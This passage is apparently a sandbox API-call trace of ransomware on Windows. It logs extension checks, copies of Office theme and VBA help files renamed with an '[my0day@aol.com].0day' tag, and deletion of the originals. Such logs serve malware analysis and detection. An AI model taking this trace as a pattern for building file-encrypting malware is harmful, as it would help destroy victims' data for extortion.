(lpString=".rar") returned 4 [0047.459] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.459] lstrlenW (lpString=".bz2") returned 4 [0047.459] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.459] lstrlenW (lpString=".7z") returned 3 [0047.459] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0047.459] lstrlenW (lpString=".dbf") returned 4 [0047.459] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0047.459] lstrlenW (lpString=".1cd") returned 4 [0047.459] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0047.459] lstrlenW (lpString=".jpg") returned 4 [0047.459] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.459] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.460] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.461] GetLastError () returned 0x0 [0047.461] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x137f, lpOverlapped=0x0) returned 1 [0047.466] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1380, lpOverlapped=0x0) returned 1 [0047.467] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.467] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.467] SetEndOfFile (hFile=0x1a8) returned 1 [0047.467] CloseHandle (hObject=0x1a8) returned 1 [0047.467] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.467] SetEndOfFile (hFile=0x210) returned 1 [0047.468] CloseHandle (hObject=0x210) returned 1 [0047.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.468] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0047.469] lstrlenW (lpString=".doc") returned 4 [0047.469] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.469] lstrlenW (lpString=".docx") returned 5 [0047.469] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.469] lstrlenW (lpString=".pdf") returned 4 [0047.469] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.469] lstrlenW (lpString=".xls") returned 4 [0047.469] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.469] lstrlenW (lpString=".xlsx") returned 5 [0047.469] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.469] lstrlenW (lpString=".ppt") returned 4 [0047.469] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0047.469] lstrlenW (lpString=".zip") returned 4 [0047.469] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.469] lstrlenW (lpString=".rar") returned 4 [0047.469] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.470] lstrlenW (lpString=".bz2") returned 4 [0047.470] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.470] lstrlenW (lpString=".7z") returned 3 [0047.470] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0047.470] lstrlenW (lpString=".dbf") returned 4 [0047.470] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0047.470] lstrlenW (lpString=".1cd") returned 4 [0047.470] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0047.470] lstrlenW (lpString=".jpg") returned 4 [0047.470] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.470] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=44302) returned 1 [0047.470] CloseHandle (hObject=0x210) returned 1 [0047.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 0x20 [0047.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.471] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.471] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.471] GetLastError () returned 0x0 [0047.471] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xad0e, lpOverlapped=0x0) returned 1 [0047.478] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xad10, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xad10, lpOverlapped=0x0) returned 1 [0047.479] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.479] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.480] SetEndOfFile (hFile=0x1a8) returned 1 [0047.480] CloseHandle (hObject=0x1a8) returned 1 [0047.480] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.480] SetEndOfFile (hFile=0x210) returned 1 [0047.481] CloseHandle (hObject=0x210) returned 1 [0047.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.481] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1 [0047.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0047.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0047.481] lstrlenW (lpString=".doc") returned 4 [0047.481] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.481] lstrlenW (lpString=".docx") returned 5 [0047.481] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.481] lstrlenW (lpString=".pdf") returned 4 [0047.481] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.481] lstrlenW (lpString=".xls") returned 4 [0047.481] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.481] lstrlenW (lpString=".xlsx") returned 5 [0047.481] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.482] lstrlenW (lpString=".ppt") returned 4 [0047.482] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0047.482] lstrlenW (lpString=".zip") returned 4 [0047.482] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.482] lstrlenW (lpString=".rar") returned 4 [0047.482] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.482] lstrlenW (lpString=".bz2") returned 4 [0047.482] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.482] lstrlenW (lpString=".7z") returned 3 [0047.482] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0047.482] lstrlenW (lpString=".dbf") returned 4 [0047.482] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0047.482] lstrlenW (lpString=".1cd") returned 4 [0047.482] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0047.482] lstrlenW (lpString=".jpg") returned 4 [0047.482] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.482] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.482] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.488] GetLastError () returned 0x0 [0047.488] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xa6c, lpOverlapped=0x0) returned 1 [0047.650] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xa70, lpOverlapped=0x0) returned 1 [0047.652] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.652] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.652] SetEndOfFile (hFile=0x1a8) returned 1 [0047.652] CloseHandle (hObject=0x1a8) returned 1 [0047.652] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.652] SetEndOfFile (hFile=0x210) returned 1 [0047.692] CloseHandle (hObject=0x210) returned 1 [0047.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.695] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 1 [0047.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0047.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0047.695] lstrlenW (lpString=".doc") returned 4 [0047.695] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.695] lstrlenW (lpString=".docx") returned 5 [0047.695] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.695] lstrlenW (lpString=".pdf") returned 4 [0047.695] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.695] lstrlenW (lpString=".xls") returned 4 [0047.695] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.695] lstrlenW (lpString=".xlsx") returned 5 [0047.695] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.695] lstrlenW (lpString=".ppt") returned 4 [0047.695] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0047.695] lstrlenW (lpString=".zip") returned 4 [0047.695] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.696] lstrlenW (lpString=".rar") returned 4 [0047.696] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.696] lstrlenW (lpString=".bz2") returned 4 [0047.696] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.696] lstrlenW (lpString=".7z") returned 3 [0047.696] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0047.696] lstrlenW (lpString=".dbf") returned 4 [0047.696] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0047.696] lstrlenW (lpString=".1cd") returned 4 [0047.696] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0047.696] lstrlenW (lpString=".jpg") returned 4 [0047.696] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.697] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.697] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.697] GetLastError () returned 0x0 [0047.697] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x51a5b, lpOverlapped=0x0) returned 1 [0047.802] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x51a60, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x51a60, lpOverlapped=0x0) returned 1 [0047.810] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.810] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0047.811] SetEndOfFile (hFile=0x1a8) returned 1 [0047.811] CloseHandle (hObject=0x1a8) returned 1 [0047.811] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.811] SetEndOfFile (hFile=0x210) returned 1 [0047.814] CloseHandle (hObject=0x210) returned 1 [0047.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.814] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 1 [0047.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0047.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0047.815] lstrlenW (lpString=".doc") returned 4 [0047.815] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString=".docx") returned 5 [0047.815] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0047.815] lstrlenW (lpString=".pdf") returned 4 [0047.815] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString=".xls") returned 4 [0047.815] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString=".xlsx") returned 5 [0047.815] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0047.815] lstrlenW (lpString=".ppt") returned 4 [0047.815] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0047.815] lstrlenW (lpString=".zip") returned 4 [0047.815] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString=".rar") returned 4 [0047.815] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString=".bz2") returned 4 [0047.815] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0047.815] lstrlenW (lpString=".7z") returned 3 [0047.815] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0047.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0047.815] lstrlenW (lpString=".dbf") returned 4 [0047.815] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0047.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0047.815] lstrlenW (lpString=".1cd") returned 4 [0047.815] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0047.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0047.815] lstrlenW (lpString=".jpg") returned 4 [0047.815] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0047.816] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=109718) returned 1 [0047.816] CloseHandle (hObject=0x210) returned 1 [0047.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 0x20 [0047.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.816] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.816] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.817] GetLastError () returned 0x0 [0047.817] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1ac96, lpOverlapped=0x0) returned 1 [0047.845] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1aca0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1aca0, lpOverlapped=0x0) returned 1 [0047.848] ReadFile (in: hFile=0x210, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.848] WriteFile (in: hFile=0x1a8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0047.848] SetEndOfFile (hFile=0x1a8) returned 1 [0047.848] CloseHandle (hObject=0x1a8) returned 1 [0047.849] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.849] SetEndOfFile (hFile=0x210) returned 1 [0047.850] CloseHandle (hObject=0x210) returned 1 [0047.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.850] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 1 [0048.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.047] lstrlenW (lpString=".doc") returned 4 [0048.047] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString=".docx") returned 5 [0048.047] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0048.047] lstrlenW (lpString=".pdf") returned 4 [0048.047] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString=".xls") returned 4 [0048.047] lstrcmpiW 